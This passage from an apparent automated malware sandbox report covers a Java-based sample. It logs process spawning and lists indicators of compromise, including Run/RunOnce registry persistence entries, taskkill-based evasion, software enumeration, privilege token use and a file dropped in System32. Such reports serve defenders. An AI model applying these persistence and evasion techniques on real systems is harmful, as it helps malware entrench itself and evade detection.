PID 1960 wrote to memory of 892	1960	cmd.exe	236
PID 1960 wrote to memory of 892	1960	cmd.exe	236
PID 900 wrote to memory of 1976	900	java.exe	237
PID 900 wrote to memory of 1976	900	java.exe	237
PID 900 wrote to memory of 1976	900	java.exe	237
PID 1976 wrote to memory of 1924	1976	cmd.exe	238
PID 1976 wrote to memory of 1924	1976	cmd.exe	238
PID 1976 wrote to memory of 1924	1976	cmd.exe	238
PID 1976 wrote to memory of 592	1976	cmd.exe	239
PID 1976 wrote to memory of 592	1976	cmd.exe	239
PID 1976 wrote to memory of 592	1976	cmd.exe	239
PID 900 wrote to memory of 2032	900	java.exe	240
PID 900 wrote to memory of 2032	900	java.exe	240
PID 900 wrote to memory of 2032	900	java.exe	240
PID 2032 wrote to memory of 760	2032	cmd.exe	241
PID 2032 wrote to memory of 760	2032	cmd.exe	241
PID 2032 wrote to memory of 760	2032	cmd.exe	241
PID 2032 wrote to memory of 1556	2032	cmd.exe	242
PID 2032 wrote to memory of 1556	2032	cmd.exe	242
PID 2032 wrote to memory of 1556	2032	cmd.exe	242
PID 900 wrote to memory of 1788	900	java.exe	243
PID 900 wrote to memory of 1788	900	java.exe	243
PID 900 wrote to memory of 1788	900	java.exe	243
PID 1788 wrote to memory of 1480	1788	cmd.exe	244
PID 1788 wrote to memory of 1480	1788	cmd.exe	244
PID 1788 wrote to memory of 1480	1788	cmd.exe	244
PID 1788 wrote to memory of 612	1788	cmd.exe	245
PID 1788 wrote to memory of 612	1788	cmd.exe	245
PID 1788 wrote to memory of 612	1788	cmd.exe	245
PID 900 wrote to memory of 1836	900	java.exe	246
PID 900 wrote to memory of 1836	900	java.exe	246
PID 900 wrote to memory of 1836	900	java.exe	246
PID 1836 wrote to memory of 1564	1836	cmd.exe	247
PID 1836 wrote to memory of 1564	1836	cmd.exe	247
PID 1836 wrote to memory of 1564	1836	cmd.exe	247
PID 1836 wrote to memory of 1680	1836	cmd.exe	248
PID 1836 wrote to memory of 1680	1836	cmd.exe	248
PID 1836 wrote to memory of 1680	1836	cmd.exe	248
PID 900 wrote to memory of 1032	900	java.exe	249
PID 900 wrote to memory of 1032	900	java.exe	249
PID 900 wrote to memory of 1032	900	java.exe	249
PID 1032 wrote to memory of 1104	1032	cmd.exe	250
PID 1032 wrote to memory of 1104	1032	cmd.exe	250
PID 1032 wrote to memory of 1104	1032	cmd.exe	250
PID 1032 wrote to memory of 592	1032	cmd.exe	251
PID 1032 wrote to memory of 592	1032	cmd.exe	251
PID 1032 wrote to memory of 592	1032	cmd.exe	251
PID 900 wrote to memory of 1852	900	java.exe	252
PID 900 wrote to memory of 1852	900	java.exe	252
PID 900 wrote to memory of 1852	900	java.exe	252
PID 1852 wrote to memory of 1076	1852	cmd.exe	253
PID 1852 wrote to memory of 1076	1852	cmd.exe	253
PID 1852 wrote to memory of 1076	1852	cmd.exe	253
PID 1852 wrote to memory of 1088	1852	cmd.exe	254
PID 1852 wrote to memory of 1088	1852	cmd.exe	254
PID 1852 wrote to memory of 1088	1852	cmd.exe	254
PID 900 wrote to memory of 1480	900	java.exe	255
PID 900 wrote to memory of 1480	900	java.exe	255
PID 900 wrote to memory of 1480	900	java.exe	255
PID 1480 wrote to memory of 1992	1480	cmd.exe	256
PID 1480 wrote to memory of 1992	1480	cmd.exe	256
PID 1480 wrote to memory of 1992	1480	cmd.exe	256
PID 1480 wrote to memory of 892	1480	cmd.exe	257
PID 1480 wrote to memory of 892	1480	cmd.exe	257
PID 1480 wrote to memory of 892	1480	cmd.exe	257
PID 900 wrote to memory of 1680	900	java.exe	258
PID 900 wrote to memory of 1680	900	java.exe	258
PID 900 wrote to memory of 1680	900	java.exe	258
PID 900 wrote to memory of 1924	900	java.exe	259
PID 900 wrote to memory of 1924	900	java.exe	259
PID 900 wrote to memory of 1924	900	java.exe	259
PID 1680 wrote to memory of 760	1680	cmd.exe	261
PID 1680 wrote to memory of 760	1680	cmd.exe	261
PID 1680 wrote to memory of 760	1680	cmd.exe	261
PID 1680 wrote to memory of 1972	1680	cmd.exe	262
PID 1680 wrote to memory of 1972	1680	cmd.exe	262
PID 1680 wrote to memory of 1972	1680	cmd.exe	262
PID 900 wrote to memory of 1564	900	java.exe	263
PID 900 wrote to memory of 1564	900	java.exe	263
PID 900 wrote to memory of 1564	900	java.exe	263
PID 1564 wrote to memory of 1988	1564	cmd.exe	264
PID 1564 wrote to memory of 1988	1564	cmd.exe	264
PID 1564 wrote to memory of 1988	1564	cmd.exe	264
PID 1564 wrote to memory of 1388	1564	cmd.exe	265
PID 1564 wrote to memory of 1388	1564	cmd.exe	265
PID 1564 wrote to memory of 1388	1564	cmd.exe	265
PID 900 wrote to memory of 1972	900	java.exe	266
PID 900 wrote to memory of 1972	900	java.exe	266
PID 900 wrote to memory of 1972	900	java.exe	266
PID 1972 wrote to memory of 592	1972	cmd.exe	267
PID 1972 wrote to memory of 592	1972	cmd.exe	267
PID 1972 wrote to memory of 592	1972	cmd.exe	267
PID 1972 wrote to memory of 1840	1972	cmd.exe	268
PID 1972 wrote to memory of 1840	1972	cmd.exe	268
PID 1972 wrote to memory of 1840	1972	cmd.exe	268
PID 900 wrote to memory of 1412	900	java.exe	269
PID 900 wrote to memory of 1412	900	java.exe	269
PID 900 wrote to memory of 1412	900	java.exe	269
PID 1412 wrote to memory of 1924	1412	cmd.exe	270
PID 1412 wrote to memory of 1924	1412	cmd.exe	270
PID 1412 wrote to memory of 1924	1412	cmd.exe	270
PID 1412 wrote to memory of 1928	1412	cmd.exe	271
PID 1412 wrote to memory of 1928	1412	cmd.exe	271
PID 1412 wrote to memory of 1928	1412	cmd.exe	271
PID 900 wrote to memory of 1556	900	java.exe	272
PID 900 wrote to memory of 1556	900	java.exe	272
PID 900 wrote to memory of 1556	900	java.exe	272
PID 1556 wrote to memory of 1076	1556	cmd.exe	273
PID 1556 wrote to memory of 1076	1556	cmd.exe	273
PID 1556 wrote to memory of 1076	1556	cmd.exe	273
PID 1556 wrote to memory of 1840	1556	cmd.exe	274
PID 1556 wrote to memory of 1840	1556	cmd.exe	274
PID 1556 wrote to memory of 1840	1556	cmd.exe	274
PID 900 wrote to memory of 1988	900	java.exe	275
PID 900 wrote to memory of 1988	900	java.exe	275
PID 900 wrote to memory of 1988	900	java.exe	275
PID 1988 wrote to memory of 612	1988	cmd.exe	276
PID 1988 wrote to memory of 612	1988	cmd.exe	276
PID 1988 wrote to memory of 612	1988	cmd.exe	276
PID 1988 wrote to memory of 1992	1988	cmd.exe	277
PID 1988 wrote to memory of 1992	1988	cmd.exe	277
PID 1988 wrote to memory of 1992	1988	cmd.exe	277
PID 900 wrote to memory of 1076	900	java.exe	278
PID 900 wrote to memory of 1076	900	java.exe	278
PID 900 wrote to memory of 1076	900	java.exe	278
PID 1076 wrote to memory of 1924	1076	cmd.exe	279
PID 1076 wrote to memory of 1924	1076	cmd.exe	279
PID 1076 wrote to memory of 1924	1076	cmd.exe	279
PID 1076 wrote to memory of 844	1076	cmd.exe	280
PID 1076 wrote to memory of 844	1076	cmd.exe	280
PID 1076 wrote to memory of 844	1076	cmd.exe	280
PID 900 wrote to memory of 1992	900	java.exe	281
PID 900 wrote to memory of 1992	900	java.exe	281
PID 900 wrote to memory of 1992	900	java.exe	281
PID 1992 wrote to memory of 760	1992	cmd.exe	282
PID 1992 wrote to memory of 760	1992	cmd.exe	282
PID 1992 wrote to memory of 760	1992	cmd.exe	282
PID 1992 wrote to memory of 612	1992	cmd.exe	283
PID 1992 wrote to memory of 612	1992	cmd.exe	283
PID 1992 wrote to memory of 612	1992	cmd.exe	283
PID 900 wrote to memory of 1924	900	java.exe	284
PID 900 wrote to memory of 1924	900	java.exe	284
PID 900 wrote to memory of 1924	900	java.exe	284
PID 1924 wrote to memory of 760	1924	cmd.exe	285
PID 1924 wrote to memory of 760	1924	cmd.exe	285
PID 1924 wrote to memory of 760	1924	cmd.exe	285
PID 1924 wrote to memory of 1928	1924	cmd.exe	286
PID 1924 wrote to memory of 1928	1924	cmd.exe	286
PID 1924 wrote to memory of 1928	1924	cmd.exe	286
PID 900 wrote to memory of 844	900	java.exe	287
PID 900 wrote to memory of 844	900	java.exe	287
PID 900 wrote to memory of 844	900	java.exe	287
PID 844 wrote to memory of 1928	844	cmd.exe	288
PID 844 wrote to memory of 1928	844	cmd.exe	288
PID 844 wrote to memory of 1928	844	cmd.exe	288
PID 844 wrote to memory of 2056	844	cmd.exe	289
PID 844 wrote to memory of 2056	844	cmd.exe	289
PID 844 wrote to memory of 2056	844	cmd.exe	289
PID 900 wrote to memory of 2068	900	java.exe	290
PID 900 wrote to memory of 2068	900	java.exe	290
PID 900 wrote to memory of 2068	900	java.exe	290
PID 2068 wrote to memory of 2080	2068	cmd.exe	291
PID 2068 wrote to memory of 2080	2068	cmd.exe	291
PID 2068 wrote to memory of 2080	2068	cmd.exe	291
PID 2068 wrote to memory of 2092	2068	cmd.exe	292
PID 2068 wrote to memory of 2092	2068	cmd.exe	292
PID 2068 wrote to memory of 2092	2068	cmd.exe	292
PID 900 wrote to memory of 2104	900	java.exe	293
PID 900 wrote to memory of 2104	900	java.exe	293
PID 900 wrote to memory of 2104	900	java.exe	293
PID 2104 wrote to memory of 2116	2104	cmd.exe	294
PID 2104 wrote to memory of 2116	2104	cmd.exe	294
PID 2104 wrote to memory of 2116	2104	cmd.exe	294
PID 2104 wrote to memory of 2128	2104	cmd.exe	295
PID 2104 wrote to memory of 2128	2104	cmd.exe	295
PID 2104 wrote to memory of 2128	2104	cmd.exe	295
PID 900 wrote to memory of 2140	900	java.exe	296
PID 900 wrote to memory of 2140	900	java.exe	296
PID 900 wrote to memory of 2140	900	java.exe	296
PID 2140 wrote to memory of 2152	2140	cmd.exe	297
PID 2140 wrote to memory of 2152	2140	cmd.exe	297
PID 2140 wrote to memory of 2152	2140	cmd.exe	297
PID 2140 wrote to memory of 2164	2140	cmd.exe	298
PID 2140 wrote to memory of 2164	2140	cmd.exe	298
PID 2140 wrote to memory of 2164	2140	cmd.exe	298
PID 900 wrote to memory of 2176	900	java.exe	299
PID 900 wrote to memory of 2176	900	java.exe	299
PID 900 wrote to memory of 2176	900	java.exe	299
PID 2176 wrote to memory of 2188	2176	cmd.exe	300
PID 2176 wrote to memory of 2188	2176	cmd.exe	300
PID 2176 wrote to memory of 2188	2176	cmd.exe	300
PID 2176 wrote to memory of 2200	2176	cmd.exe	301
PID 2176 wrote to memory of 2200	2176	cmd.exe	301
PID 2176 wrote to memory of 2200	2176	cmd.exe	301
PID 900 wrote to memory of 2212	900	java.exe	302
PID 900 wrote to memory of 2212	900	java.exe	302
PID 900 wrote to memory of 2212	900	java.exe	302
PID 900 wrote to memory of 2260	900	java.exe	304
PID 900 wrote to memory of 2260	900	java.exe	304
PID 900 wrote to memory of 2260	900	java.exe	304
PID 900 wrote to memory of 2308	900	java.exe	306
PID 900 wrote to memory of 2308	900	java.exe	306
PID 900 wrote to memory of 2308	900	java.exe	306
PID 900 wrote to memory of 2364	900	java.exe	308
PID 900 wrote to memory of 2364	900	java.exe	308
PID 900 wrote to memory of 2364	900	java.exe	308
PID 900 wrote to memory of 2412	900	java.exe	310
PID 900 wrote to memory of 2412	900	java.exe	310
PID 900 wrote to memory of 2412	900	java.exe	310
PID 900 wrote to memory of 2460	900	java.exe	312
PID 900 wrote to memory of 2460	900	java.exe	312
PID 900 wrote to memory of 2460	900	java.exe	312
PID 900 wrote to memory of 2508	900	java.exe	314
PID 900 wrote to memory of 2508	900	java.exe	314
PID 900 wrote to memory of 2508	900	java.exe	314

Adds Run entry to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\CROXxDB = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\rMnZL\\Suteu.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\CROXxDB = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\rMnZL\\Suteu.class\""	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\rMnZL\Desktop.ini	java.exe
File created	C:\Users\Admin\rMnZL\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\rMnZL\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\rMnZL\Desktop.ini	attrib.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
1572	taskkill.exe
1892	taskkill.exe
2508	taskkill.exe
1368	taskkill.exe
1924	taskkill.exe
2212	taskkill.exe
2460	taskkill.exe
1940	taskkill.exe
2260	taskkill.exe
2412	taskkill.exe
1664	taskkill.exe
1644	taskkill.exe
1564	taskkill.exe
1556	taskkill.exe
2308	taskkill.exe
2364	taskkill.exe

Checks for installed software on the system 1 TTPs 52 IoCs

discovery

Query Registry

T1012

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0015-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0044-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00A1-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0016-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0018-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-006E-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-002C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-040C-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0170800}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0043-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-00BA-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0115-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0117-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0019-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001A-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{09CCBE8E-B964-30EF-AE84-6537AB4197F9}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001B-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F06417080FF}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
900	java.exe

Suspicious use of AdjustPrivilegeToken 137 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	764	WMIC.exe
Token: SeSecurityPrivilege	764	WMIC.exe
Token: SeTakeOwnershipPrivilege	764	WMIC.exe
Token: SeLoadDriverPrivilege	764	WMIC.exe
Token: SeSystemProfilePrivilege	764	WMIC.exe
Token: SeSystemtimePrivilege	764	WMIC.exe
Token: SeProfSingleProcessPrivilege	764	WMIC.exe
Token: SeIncBasePriorityPrivilege	764	WMIC.exe
Token: SeCreatePagefilePrivilege	764	WMIC.exe
Token: SeBackupPrivilege	764	WMIC.exe
Token: SeRestorePrivilege	764	WMIC.exe
Token: SeShutdownPrivilege	764	WMIC.exe
Token: SeDebugPrivilege	764	WMIC.exe
Token: SeSystemEnvironmentPrivilege	764	WMIC.exe
Token: SeRemoteShutdownPrivilege	764	WMIC.exe
Token: SeUndockPrivilege	764	WMIC.exe
Token: SeManageVolumePrivilege	764	WMIC.exe
Token: 33	764	WMIC.exe
Token: 34	764	WMIC.exe
Token: 35	764	WMIC.exe
Token: SeIncreaseQuotaPrivilege	764	WMIC.exe
Token: SeSecurityPrivilege	764	WMIC.exe
Token: SeTakeOwnershipPrivilege	764	WMIC.exe
Token: SeLoadDriverPrivilege	764	WMIC.exe
Token: SeSystemProfilePrivilege	764	WMIC.exe
Token: SeSystemtimePrivilege	764	WMIC.exe
Token: SeProfSingleProcessPrivilege	764	WMIC.exe
Token: SeIncBasePriorityPrivilege	764	WMIC.exe
Token: SeCreatePagefilePrivilege	764	WMIC.exe
Token: SeBackupPrivilege	764	WMIC.exe
Token: SeRestorePrivilege	764	WMIC.exe
Token: SeShutdownPrivilege	764	WMIC.exe
Token: SeDebugPrivilege	764	WMIC.exe
Token: SeSystemEnvironmentPrivilege	764	WMIC.exe
Token: SeRemoteShutdownPrivilege	764	WMIC.exe
Token: SeUndockPrivilege	764	WMIC.exe
Token: SeManageVolumePrivilege	764	WMIC.exe
Token: 33	764	WMIC.exe
Token: 34	764	WMIC.exe
Token: 35	764	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1080	WMIC.exe
Token: SeSecurityPrivilege	1080	WMIC.exe
Token: SeTakeOwnershipPrivilege	1080	WMIC.exe
Token: SeLoadDriverPrivilege	1080	WMIC.exe
Token: SeSystemProfilePrivilege	1080	WMIC.exe
Token: SeSystemtimePrivilege	1080	WMIC.exe
Token: SeProfSingleProcessPrivilege	1080	WMIC.exe
Token: SeIncBasePriorityPrivilege	1080	WMIC.exe
Token: SeCreatePagefilePrivilege	1080	WMIC.exe
Token: SeBackupPrivilege	1080	WMIC.exe
Token: SeRestorePrivilege	1080	WMIC.exe
Token: SeShutdownPrivilege	1080	WMIC.exe
Token: SeDebugPrivilege	1080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1080	WMIC.exe
Token: SeRemoteShutdownPrivilege	1080	WMIC.exe
Token: SeUndockPrivilege	1080	WMIC.exe
Token: SeManageVolumePrivilege	1080	WMIC.exe
Token: 33	1080	WMIC.exe
Token: 34	1080	WMIC.exe
Token: 35	1080	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1080	WMIC.exe
Token: SeSecurityPrivilege	1080	WMIC.exe
Token: SeTakeOwnershipPrivilege	1080	WMIC.exe
Token: SeLoadDriverPrivilege	1080	WMIC.exe
Token: SeSystemProfilePrivilege	1080	WMIC.exe
Token: SeSystemtimePrivilege	1080	WMIC.exe
Token: SeProfSingleProcessPrivilege	1080	WMIC.exe
Token: SeIncBasePriorityPrivilege	1080	WMIC.exe
Token: SeCreatePagefilePrivilege	1080	WMIC.exe
Token: SeBackupPrivilege	1080	WMIC.exe
Token: SeRestorePrivilege	1080	WMIC.exe
Token: SeShutdownPrivilege	1080	WMIC.exe
Token: SeDebugPrivilege	1080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1080	WMIC.exe
Token: SeRemoteShutdownPrivilege	1080	WMIC.exe
Token: SeUndockPrivilege	1080	WMIC.exe
Token: SeManageVolumePrivilege	1080	WMIC.exe
Token: 33	1080	WMIC.exe
Token: 34	1080	WMIC.exe
Token: 35	1080	WMIC.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	1368	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1972	WMIC.exe
Token: SeSecurityPrivilege	1972	WMIC.exe
Token: SeTakeOwnershipPrivilege	1972	WMIC.exe
Token: SeLoadDriverPrivilege	1972	WMIC.exe
Token: SeSystemProfilePrivilege	1972	WMIC.exe
Token: SeSystemtimePrivilege	1972	WMIC.exe
Token: SeProfSingleProcessPrivilege	1972	WMIC.exe
Token: SeIncBasePriorityPrivilege	1972	WMIC.exe
Token: SeCreatePagefilePrivilege	1972	WMIC.exe
Token: SeBackupPrivilege	1972	WMIC.exe
Token: SeRestorePrivilege	1972	WMIC.exe
Token: SeShutdownPrivilege	1972	WMIC.exe
Token: SeDebugPrivilege	1972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1972	WMIC.exe
Token: SeRemoteShutdownPrivilege	1972	WMIC.exe
Token: SeUndockPrivilege	1972	WMIC.exe
Token: SeManageVolumePrivilege	1972	WMIC.exe
Token: 33	1972	WMIC.exe
Token: 34	1972	WMIC.exe
Token: 35	1972	WMIC.exe
Token: SeDebugPrivilege	1644	taskkill.exe
Token: SeIncreaseQuotaPrivilege	1972	WMIC.exe
Token: SeSecurityPrivilege	1972	WMIC.exe
Token: SeTakeOwnershipPrivilege	1972	WMIC.exe
Token: SeLoadDriverPrivilege	1972	WMIC.exe
Token: SeSystemProfilePrivilege	1972	WMIC.exe
Token: SeSystemtimePrivilege	1972	WMIC.exe
Token: SeProfSingleProcessPrivilege	1972	WMIC.exe
Token: SeIncBasePriorityPrivilege	1972	WMIC.exe
Token: SeCreatePagefilePrivilege	1972	WMIC.exe
Token: SeBackupPrivilege	1972	WMIC.exe
Token: SeRestorePrivilege	1972	WMIC.exe
Token: SeShutdownPrivilege	1972	WMIC.exe
Token: SeDebugPrivilege	1972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1972	WMIC.exe
Token: SeRemoteShutdownPrivilege	1972	WMIC.exe
Token: SeUndockPrivilege	1972	WMIC.exe
Token: SeManageVolumePrivilege	1972	WMIC.exe
Token: 33	1972	WMIC.exe
Token: 34	1972	WMIC.exe
Token: 35	1972	WMIC.exe
Token: SeDebugPrivilege	1572	taskkill.exe
Token: SeDebugPrivilege	1892	taskkill.exe
Token: SeDebugPrivilege	1564	taskkill.exe
Token: SeDebugPrivilege	1940	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	1924	taskkill.exe
Token: SeDebugPrivilege	2212	taskkill.exe
Token: SeDebugPrivilege	2260	taskkill.exe
Token: SeDebugPrivilege	2308	taskkill.exe
Token: SeDebugPrivilege	2364	taskkill.exe
Token: SeDebugPrivilege	2412	taskkill.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeDebugPrivilege	2508	taskkill.exe

Loads dropped DLL 1 IoCs

pid	Process
900	java.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1576	powershell.exe
1576	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\ZjspE	java.exe
File opened for modification	C:\Windows\System32\ZjspE	java.exe

Views/modifies file attributes 1 TTPs 8 IoCs

evasion
